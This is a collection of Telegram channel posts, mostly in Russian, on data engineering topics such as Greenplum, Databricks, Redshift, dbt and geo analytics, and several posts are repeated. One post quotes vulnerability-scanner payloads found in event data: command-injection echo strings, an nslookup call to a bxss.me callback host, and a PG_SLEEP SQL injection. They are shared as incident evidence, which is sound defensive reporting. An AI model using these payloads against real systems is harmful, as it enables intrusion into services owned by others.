Сегодня хотел бы поговорить о широко распространенной СУБД Greenplum и, в частности, о Platform Extension Framework (PXF) - расширении, с помощью которого открываются почти неограниченные возможности интеграции с множеством внешних систем и форматов данных.
В этой публикации Вас ждет:
– Основные возможности PXF, конфигурация, способы оптимизации.
– Организация Extract - Load с помощью PXF (Data Lake / OLTP).
– Объединение локальных и внешних таблиц в запросах (Federated queries).
– Запись данных во внешние системы (Clickhouse).
Читать на Хабр →
#pipelines #ELT #dwh #greenplum #pxf
В этой публикации Вас ждет:
– Основные возможности PXF, конфигурация, способы оптимизации.
– Организация Extract - Load с помощью PXF (Data Lake / OLTP).
– Объединение локальных и внешних таблиц в запросах (Federated queries).
– Запись данных во внешние системы (Clickhouse).
Читать на Хабр →
#pipelines #ELT #dwh #greenplum #pxf
Хабр
Сценарии применения Greenplum PXF для интеграции с Data Lake, OLTP, Clickhouse
Привет! Меня зовут Артемий Козырь, и я Analytics Engineer в Wheely. Популярность массивно-параллельных СУБД ( MPP ) для решения аналитических задач неукоснительно растет. Сегодня хотел бы...
Ух, как же много материала, которым хочется поделиться.
Не всё успеваю публиковать. Подал заявку на доклад на конфе SmartData
Будете ждать? 🤔
Не всё успеваю публиковать. Подал заявку на доклад на конфе SmartData
Будете ждать? 🤔
Somebody is overwhelming our analytics trying to find security breaches.
A brief infrastructure setup: we gather user events data in mobile apps (iOS, Android) and Web via Snowplow trackers, send it to Kafka queues, then land the data into DWH (Redshift) staging area.
Looks like a vulnerability scanner is used. Take a look at the sample data:
What I've done so far:
1. Filtered out and deleted problem rows from database
2. Enforced data type checks
Curious case. Finally I have faced with tech pirates 😵💫
Let's see if it works fine. Any other ideas?
A brief infrastructure setup: we gather user events data in mobile apps (iOS, Android) and Web via Snowplow trackers, send it to Kafka queues, then land the data into DWH (Redshift) staging area.
Looks like a vulnerability scanner is used. Take a look at the sample data:
echo bvazvs$()\ igzdlg\nz^xyu||a #' &echo bvazvs$()\ igzdlg\nz^xyu||a #|" &echo bvazvs$()\ igzdlg\nz^xyu||a #Despite basic checks are enforced (non-empty string, valid json), around 1k events managed to get into DWH 😐
bxss.me/t/xss.html?%00
`(nslookup hitxbheyywgyq5e37d.bxss.me||perl -e "gethostbyname('hitxbheyywgyq5e37d.bxss.me')")`
aUV52Y1o' OR 826=(SELECT 826 FROM PG_SLEEP(15))--
^(#$!@#$)(()))******
What I've done so far:
1. Filtered out and deleted problem rows from database
2. Enforced data type checks
Curious case. Finally I have faced with tech pirates 😵💫
Let's see if it works fine. Any other ideas?
Data Apps Design
Ух, как же много материала, которым хочется поделиться. Не всё успеваю публиковать. Подал заявку на доклад на конфе SmartData Будете ждать? 🤔
Получил отказ
"Немного деталей, которые повлияли на наше решение:
То что вы применяете бест практики из разработки - это отлично, но для нашей конференции в докладе все же не хватает технического наполнения. Возможно, это потому что мы нацелины больше на инженеров, которые уже очень хорошо знакомы со системой контроля версий, CI/CD и вот это вот все. Нам кажется, что для нашей целевой аудитории доклад не будет иметь прикладной полезности."
Технические детали это: "Я говорила про различные вариации b-tree в движках, как пример того, насколько глубокие технические подробности нам интересны"
B-tree в аналитических СУБД и больших данных в 2022... Бугага 😂
Есть идеи, на какой RU конфе готовы слушать про Modern Data Stack / Analytics Engineering?
Про Сoalesce в курсе, но в этом году уже поздно.
"Немного деталей, которые повлияли на наше решение:
То что вы применяете бест практики из разработки - это отлично, но для нашей конференции в докладе все же не хватает технического наполнения. Возможно, это потому что мы нацелины больше на инженеров, которые уже очень хорошо знакомы со системой контроля версий, CI/CD и вот это вот все. Нам кажется, что для нашей целевой аудитории доклад не будет иметь прикладной полезности."
Технические детали это: "Я говорила про различные вариации b-tree в движках, как пример того, насколько глубокие технические подробности нам интересны"
B-tree в аналитических СУБД и больших данных в 2022... Бугага 😂
Есть идеи, на какой RU конфе готовы слушать про Modern Data Stack / Analytics Engineering?
Про Сoalesce в курсе, но в этом году уже поздно.
Getdbt
Coalesce Conference | Crafted by dbt Labs
Join dbt Labs and thousands of analytics professionals at our premier data conference, Coalesce.
Databricks + Wheely Proof of Concept
I will be assessing Databricks as our new data platform (to succeed AWS Redshift)
– Requirements to E - L - T
– Current setup description
– Proof of Concept plan
Desired business impact:
– Cost effective (at least compared to what we currently spend on AWS Redshift reserved flat rate)
– Performance gains desired
– Extended features support (H3, in-database ML, Advanced analytics, ...)
– Access to ecosystem (docs, solutions, code examples, how-to guides)
– Democratization of access to data and data-related services: built-in Notebook experience
– No degradation (performance, outage, timeouts, job failures) in comparison with current state
🌐 @data_apps | Навигация по каналу
I will be assessing Databricks as our new data platform (to succeed AWS Redshift)
– Requirements to E - L - T
– Current setup description
– Proof of Concept plan
Desired business impact:
– Cost effective (at least compared to what we currently spend on AWS Redshift reserved flat rate)
– Performance gains desired
– Extended features support (H3, in-database ML, Advanced analytics, ...)
– Access to ecosystem (docs, solutions, code examples, how-to guides)
– Democratization of access to data and data-related services: built-in Notebook experience
– No degradation (performance, outage, timeouts, job failures) in comparison with current state
Please open Telegram to view this post
VIEW IN TELEGRAM
Gist
Databricks + Wheely Proof of Concept
Databricks + Wheely Proof of Concept. GitHub Gist: instantly share code, notes, and snippets.
👍11😍1
Data Apps Design
Databricks + Wheely Proof of Concept I will be assessing Databricks as our new data platform (to succeed AWS Redshift) – Requirements to E - L - T – Current setup description – Proof of Concept plan Desired business impact: – Cost effective (at least…
❓ Very interesting. But what lacks in AWS Redshift?
AWS Redshift is really good. However
– Sometimes it seems to lack certain features (read GeoJSON, index geo data via H3 lib).
– It takes ~10 seconds to parse any query for the first time.
– I've faced with a couple of internal bugs (no. much affecting workloads, but still).
– I want to explore if I can save some costs if I use serverless solutions (pay as much as you have consumed compute resources).
– Using OSS formats like Parquet / Delta files might be beneficial
And I want to trial something else 😃🤔
AWS Redshift is really good. However
– Sometimes it seems to lack certain features (read GeoJSON, index geo data via H3 lib).
– It takes ~10 seconds to parse any query for the first time.
– I've faced with a couple of internal bugs (no. much affecting workloads, but still).
– I want to explore if I can save some costs if I use serverless solutions (pay as much as you have consumed compute resources).
– Using OSS formats like Parquet / Delta files might be beneficial
And I want to trial something else 😃🤔
👍4❤2😁1🤔1
26 октября (среда) в 20:00 проведу вебинар:
Работа с ГЕО-данными в DWH: координаты, зоны, агрегация
– Привязка событий к зонам на карте города
– Агрегирование и аналитика данных с помощью H3 (гексагоны)
– Оптмизация расчетов и производительности, кэширование
Расскажу подробно, как это устроено в проекте Wheely, над которым я работаю.
Как и зачем индексировать данные (например, с использованием библиотеки H3 от Uber).
Выполнение гео-операций, проверка вхождения точки в конкретные зоны (аэропорты, вокзалы, ТЦ, районы города).
⬇️ Ссылка на YouTube-трансляцию будет в этом канале
🌐 @data_apps | Навигация по каналу
Работа с ГЕО-данными в DWH: координаты, зоны, агрегация
– Привязка событий к зонам на карте города
– Агрегирование и аналитика данных с помощью H3 (гексагоны)
– Оптмизация расчетов и производительности, кэширование
Расскажу подробно, как это устроено в проекте Wheely, над которым я работаю.
Как и зачем индексировать данные (например, с использованием библиотеки H3 от Uber).
Выполнение гео-операций, проверка вхождения точки в конкретные зоны (аэропорты, вокзалы, ТЦ, районы города).
⬇️ Ссылка на YouTube-трансляцию будет в этом канале
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10🔥6
Data Apps Design
26 октября (среда) в 20:00 проведу вебинар: Работа с ГЕО-данными в DWH: координаты, зоны, агрегация – Привязка событий к зонам на карте города – Агрегирование и аналитика данных с помощью H3 (гексагоны) – Оптмизация расчетов и производительности, кэширование…
Запись вебинара в YouTube: https://www.youtube.com/watch?v=IS5PIOhXLdk
Посмотреть слайды можно по ссылке:
https://docs.google.com/presentation/d/1Z-SLGvpHL2CbguVS-71-eCW6-I1olkrQxJhIPKtnKps/edit?usp=sharing
🌐 @data_apps | Навигация по каналу
Посмотреть слайды можно по ссылке:
https://docs.google.com/presentation/d/1Z-SLGvpHL2CbguVS-71-eCW6-I1olkrQxJhIPKtnKps/edit?usp=sharing
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Работа с ГЕО-данными в DWH: координаты, зоны, агрегация // Демо-занятие курса «Data Engineer»
На открытом уроке рассмотрим:
- Привязка событий к зонам на карте города;
- Агрегирование и аналитика данных с помощью H3 (гексагоны);
- Оптмизация расчетов и производительности, кэширование.
«Data Engineer» - https://otus.pw/4Ogq/
Преподаватель: Артемий…
- Привязка событий к зонам на карте города;
- Агрегирование и аналитика данных с помощью H3 (гексагоны);
- Оптмизация расчетов и производительности, кэширование.
«Data Engineer» - https://otus.pw/4Ogq/
Преподаватель: Артемий…
👍5🔥1
Важнейшие критерии при выборе Extract – Load решения для интеграции данных в DWH
В публикации резюмирую свои знания:
— Каталог поддерживаемых источников и приемников данных.
— Метод чтения данных из источников (Extract).
— Способы репликации в целевое Хранилище (Load).
— Работа с изменениями структуры данных (Schema Evolution).
— Трансформации перед загрузкой данных (EtLT).
— Тип развертывания решения (Deployment).
Буду объяснять и показывать примеры на сервисах, которые использовал сам: Hevo Data, Fivetran, Airbyte. Однако критерии универсальны и применимы для любых других систем подобного класса.
Читать на Хабр →
#Pipelines #ELT
🌐 @data_apps | Навигация по каналу
В публикации резюмирую свои знания:
— Каталог поддерживаемых источников и приемников данных.
— Метод чтения данных из источников (Extract).
— Способы репликации в целевое Хранилище (Load).
— Работа с изменениями структуры данных (Schema Evolution).
— Трансформации перед загрузкой данных (EtLT).
— Тип развертывания решения (Deployment).
Буду объяснять и показывать примеры на сервисах, которые использовал сам: Hevo Data, Fivetran, Airbyte. Однако критерии универсальны и применимы для любых других систем подобного класса.
Читать на Хабр →
#Pipelines #ELT
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
Важнейшие критерии при выборе Extract – Load решения для интеграции данных в DWH
Если вопросы о том, зачем нужна интеграция данных, в чем различия ETL и ELT, как правило уже не требуют пояснений и ответов, и очевидны почти всем, то вопросы о том, какой именно Extract - Load сервис...
🔥7👍3
Databricks - пока понятно то, что ничего непонятно
Пробую Databricks
– Установка в свой аккаунт AWS, сделать может только администратор (это не я) - ОК
– Развертывание в Cloud Formation Stack в пару кликов, вроде удобно. Однако очень сложно понять, что происходит и зачем: S3, IAM, Lambda, CopyZips(??)
– Сразу поднялись 3 жирных EC2 Instances i3.xlarge (зачем??), явным образом меня об этом не спросили, это не было очевидно
– Очень много текста в документации, но хочется поглотить всё
Кто пользуется Databricks?
Какие самые главные советы можете дать?
Пробую Databricks
– Установка в свой аккаунт AWS, сделать может только администратор (это не я) - ОК
– Развертывание в Cloud Formation Stack в пару кликов, вроде удобно. Однако очень сложно понять, что происходит и зачем: S3, IAM, Lambda, CopyZips(??)
– Сразу поднялись 3 жирных EC2 Instances i3.xlarge (зачем??), явным образом меня об этом не спросили, это не было очевидно
– Очень много текста в документации, но хочется поглотить всё
Кто пользуется Databricks?
Какие самые главные советы можете дать?
21 ноября (понедельник) в 20:00 проведу вебинар:
🚀 Аналитика продуктивности команд разработки на основе данных Github 🚀
Вы узнаете:
🔹 Каким образом собирать события организации из Github (Webhook, Airbyte)
🔹 С помощью чего осуществить парсинг, трансформации, сборку витрин данных (dbt)
🔹 Как приготовить метрики: PR Rate, Time to Review / Merge (Looker)
Кому подходит:
🔹 Начинающим и продолжающим специалистам в области Аналитики данных, Data Engineering
🔹 Тем, кто интересуется современными подходами организации Хранилищ Данных
🔹 Руководителям команд разработки, менеджерам и даже CTO
Результаты:
🔹 Познакомитесь с современными инструментами организации DWH
🔹 Поймете, как устроены процессы разработки ПО в современных компаниях
🔹 Получите понимание, какие метрики интересуют руководителей разработки
Регистрация по ссылке →
⬇️ Ссылка на YouTube-трансляцию будет в этом канале за час до начала
#webinars
🌐 @data_apps | Навигация по каналу
🚀 Аналитика продуктивности команд разработки на основе данных Github 🚀
Вы узнаете:
🔹 Каким образом собирать события организации из Github (Webhook, Airbyte)
🔹 С помощью чего осуществить парсинг, трансформации, сборку витрин данных (dbt)
🔹 Как приготовить метрики: PR Rate, Time to Review / Merge (Looker)
Кому подходит:
🔹 Начинающим и продолжающим специалистам в области Аналитики данных, Data Engineering
🔹 Тем, кто интересуется современными подходами организации Хранилищ Данных
🔹 Руководителям команд разработки, менеджерам и даже CTO
Результаты:
🔹 Познакомитесь с современными инструментами организации DWH
🔹 Поймете, как устроены процессы разработки ПО в современных компаниях
🔹 Получите понимание, какие метрики интересуют руководителей разработки
Регистрация по ссылке →
⬇️ Ссылка на YouTube-трансляцию будет в этом канале за час до начала
#webinars
Please open Telegram to view this post
VIEW IN TELEGRAM
otus.ru
Data Warehouse Analyst
Моделирование данных, продвинутая аналитика, дашбординг, BI, ELT, аналитические СУБД
👍7🔥2
Data Apps Design
21 ноября (понедельник) в 20:00 проведу вебинар: 🚀 Аналитика продуктивности команд разработки на основе данных Github 🚀 Вы узнаете: 🔹 Каким образом собирать события организации из Github (Webhook, Airbyte) 🔹 С помощью чего осуществить парсинг, трансформации…
🚀 Аналитика продуктивности команд разработки на основе данных Github 🚀
🔹 Запись вебинара в YouTube: https://youtu.be/Y_xGZzI5sNI
🔹 Слайды: https://docs.google.com/presentation/d/187qBQGZWYpCkBAptNCCgHr8YZonMuHuwiZ6GlN5XMBY/edit?usp=sharing
🌐 @data_apps | Навигация по каналу
🔹 Запись вебинара в YouTube: https://youtu.be/Y_xGZzI5sNI
🔹 Слайды: https://docs.google.com/presentation/d/187qBQGZWYpCkBAptNCCgHr8YZonMuHuwiZ6GlN5XMBY/edit?usp=sharing
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Аналитика продуктивности команд разработки на основе данных Github // курс «Data Warehouse Analyst»
Вы узнаете:
- Каким образом собирать события организации из Github (Webhook, Airbyte)
- С помощью чего осуществить парсинг, трансформации, сборку витрин данных (dbt)
- Как приготовить метрики: PR Rate, Time to Review / Merge (Looker)
Кому подходит этот урок:…
- Каким образом собирать события организации из Github (Webhook, Airbyte)
- С помощью чего осуществить парсинг, трансформации, сборку витрин данных (dbt)
- Как приготовить метрики: PR Rate, Time to Review / Merge (Looker)
Кому подходит этот урок:…
👍4
💎 Операционализация аналитики c инструментами класса reverse ETL – опыт использования Census 💎
В публикации:
— Место reverse ETL в схеме потоков данных
— Потребность в решении задач операционной аналитики
— Различные способы организации reverse ETL
— Кейс: Census для синхронизации данных в Pipedrive CRM
Сегодня Операционная аналитика и практики reverse ETL - не столько дань моде, сколько насущная потребность многих компаний. Создать идеальное Хранилище мало, ведь данные создают ценность только тогда, когда вы способны их использовать.
Читать на Хабр →
#Pipelines #reverse-ETL
🌐 @data_apps | Навигация по каналу
В публикации:
— Место reverse ETL в схеме потоков данных
— Потребность в решении задач операционной аналитики
— Различные способы организации reverse ETL
— Кейс: Census для синхронизации данных в Pipedrive CRM
Сегодня Операционная аналитика и практики reverse ETL - не столько дань моде, сколько насущная потребность многих компаний. Создать идеальное Хранилище мало, ведь данные создают ценность только тогда, когда вы способны их использовать.
Читать на Хабр →
#Pipelines #reverse-ETL
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
Операционализация аналитики c инструментами класса reverse ETL – опыт использования Census
Сегодня Операционная аналитика и практики reverse ETL - не столько дань моде, сколько насущная потребность многих компаний. Создать идеальное Хранилище мало, ведь данные...
⚡4👍1
🚀 Released myBI dbt Core and myBI Market showcase
⚙️ myBI dbt Core module allows quick start transformations on top of data synced by myBI Connect along with multiple useful macros.
— Supported Adapters: Clickhouse, PostgreSQL
— Reference any data source as simple as
— Leverage macros:
⚡️ myBI Market showcase guides you through building Modern Data Stack analytics:
— Configure environment
— Install and configure
— Configure data sources
— Build staging layer models
— Model Data Marts
— Visualize on a dashboard
— Publish dbt project docs
— Introduce Continuous Integration
Check it out and leave your comments and questions in Tg discussions.
I will follow up with detailed publications on Habr soon.
🌐 @data_apps | Навигация по каналу
⚙️ myBI dbt Core module allows quick start transformations on top of data synced by myBI Connect along with multiple useful macros.
— Supported Adapters: Clickhouse, PostgreSQL
— Reference any data source as simple as
select * from source('general', 'dates')
— Build staging layer in one command with filters on account_id applied, pre-join with date dimension, comprehensive data testing (unique, not_null, relationships)— Leverage macros:
source_filter_rows to limit rows for dev/test environments, any macro from dbt_utils package⚡️ myBI Market showcase guides you through building Modern Data Stack analytics:
— Configure environment
— Install and configure
mybi_dbt_core package— Configure data sources
— Build staging layer models
— Model Data Marts
— Visualize on a dashboard
— Publish dbt project docs
— Introduce Continuous Integration
Check it out and leave your comments and questions in Tg discussions.
I will follow up with detailed publications on Habr soon.
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - kzzzr/mybi-dbt-core: dbt module for myBI connect
dbt module for myBI connect. Contribute to kzzzr/mybi-dbt-core development by creating an account on GitHub.
🔥7🤩1🏆1
Finishing a new Analytics Engineering Lab on Github
🚀 DWH powered by Clickhouse and dbt
– Build DWH powered by Clickhouse and dbt
– Deploy Infrastructure as Code with Terraform and Yandex.Cloud
– Instant development with Github Codespaces
– Assignment checks with Github Actions
#lab #modeling #dbt #iac
🚀 DWH powered by Clickhouse and dbt
– Build DWH powered by Clickhouse and dbt
– Deploy Infrastructure as Code with Terraform and Yandex.Cloud
– Instant development with Github Codespaces
– Assignment checks with Github Actions
#lab #modeling #dbt #iac
GitHub
GitHub - kzzzr/dbt_clickhouse_lab: DWH powered by Clickhouse and dbt
DWH powered by Clickhouse and dbt. Contribute to kzzzr/dbt_clickhouse_lab development by creating an account on GitHub.
👍4🔥2
⚡️ I have run a Proof of Concept with Redshift Serverless
And here's the summary:
— Reserving Redshift nodes is the best option given specific usage patterns.
— Reserved nodes are 30% cheaper than on-demand ones.
— Serverless doesn't show stable and production-ready results: faced with multiple query failures during data refresh.
— Moreover, Serverless will definitely cost more with the same usage patterns.
Read more →
#dbt #redshift #database #serverless
🌐 @data_apps | Навигация по каналу
And here's the summary:
— Reserving Redshift nodes is the best option given specific usage patterns.
— Reserved nodes are 30% cheaper than on-demand ones.
— Serverless doesn't show stable and production-ready results: faced with multiple query failures during data refresh.
— Moreover, Serverless will definitely cost more with the same usage patterns.
Read more →
#dbt #redshift #database #serverless
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Redshift Serverless PoC
Summary Reserving Redshift nodes is the best option given specific usage patterns. Reserved nodes are 30% cheaper than on-demand ones. Serverless doesn't show stable and production-ready results: faced with multiple query failures during data refresh. Moreover…
👍3⚡1🔥1
Why I use dev containers?
How to package dbt and dependencies to a reproducible container
– works almost instanty for you and team members
– latest stable dbt + adapter versions
– easy inividual secrets set up
– configuring multiple dbt targets
– fancy terminal: zsh + git plugin + shell history
+ 30 second gif live demo
Read more →
#dbt #dev #container
🌐 @data_apps | Навигация по каналу
How to package dbt and dependencies to a reproducible container
– works almost instanty for you and team members
– latest stable dbt + adapter versions
– easy inividual secrets set up
– configuring multiple dbt targets
– fancy terminal: zsh + git plugin + shell history
+ 30 second gif live demo
Read more →
#dbt #dev #container
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Why I use dev containers?
How to package dbt and dependencies to a reproducible container works almost instanty for you and team members latest stable dbt + adapter versions easy inividual secrets set up configuring multiple dbt targets fancy terminal: zsh + git plugin + shell history…
❤🔥3⚡1🍓1